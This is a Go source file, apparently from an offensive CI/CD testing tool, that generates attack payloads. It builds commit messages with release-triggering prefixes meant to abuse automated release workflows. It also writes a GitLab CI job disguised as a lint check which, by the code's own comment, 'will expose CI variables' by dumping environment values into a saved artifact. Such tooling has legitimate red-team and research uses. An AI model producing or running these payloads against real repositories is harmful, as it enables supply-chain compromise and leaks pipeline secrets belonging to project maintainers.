package payloads

import (
	"fmt"
	"strings"
)

// CommitPrefixOptions configures the commit prefix attack.
type CommitPrefixOptions struct {
	Prefix  string // e.g. "feat:", "fix:", "chore:", "build:", "release:", "ci:"
	Message string // the rest of the commit message
}

// DefaultPrefixes lists common release-triggering commit message prefixes.
var DefaultPrefixes = []string{"feat:", "fix:", "chore:", "build:", "release:", "ci:"}

// GenerateCommitPrefixMessage generates a commit message with a release-triggering
// prefix designed to abuse automated release workflows (AsyncAPI attack pattern).
func GenerateCommitPrefixMessage(o CommitPrefixOptions) string {
	prefix := strings.TrimSpace(o.Prefix)
	if prefix == "" {
		prefix = "feat:"
	}
	if !strings.HasSuffix(prefix, ":") {
		prefix += ":"
	}

	msg := strings.TrimSpace(o.Message)
	if msg == "" {
		msg = "update dependency versions"
	}

	return prefix + " " + msg
}

// CommitPrefixYAMLOptions configures a CI job to push alongside the prefixed commit.
type CommitPrefixYAMLOptions struct {
	Common CommonOptions
	Prefix CommitPrefixOptions
}

// GenerateCommitPrefixYAML returns a minimal GitLab CI job that looks benign
// but will expose CI variables when the release pipeline triggers.
func GenerateCommitPrefixYAML(o CommitPrefixYAMLOptions) string {
	name, stage := o.Common.defaults("lint-check")

	body := fmt.Sprintf("# Auto-generated by GoGatoZ (Commit Prefix)\nstages: [%s]\n\n%s:\n  stage: %s%s%s\n  script:\n    - echo \"Running lint checks...\"\n    - printenv | grep -i version > version-info.txt || true\n    - echo \"Lint complete\"\n  artifacts:\n    when: always\n    paths:\n      - version-info.txt\n    expire_in: 1 day\n  allow_failure: true%s\n",
		stage, name, stage,
		imageLine(o.Common.Image),
		tagsLine(o.Common.Tags),
		rulesManual(o.Common.Manual))
	return body
}
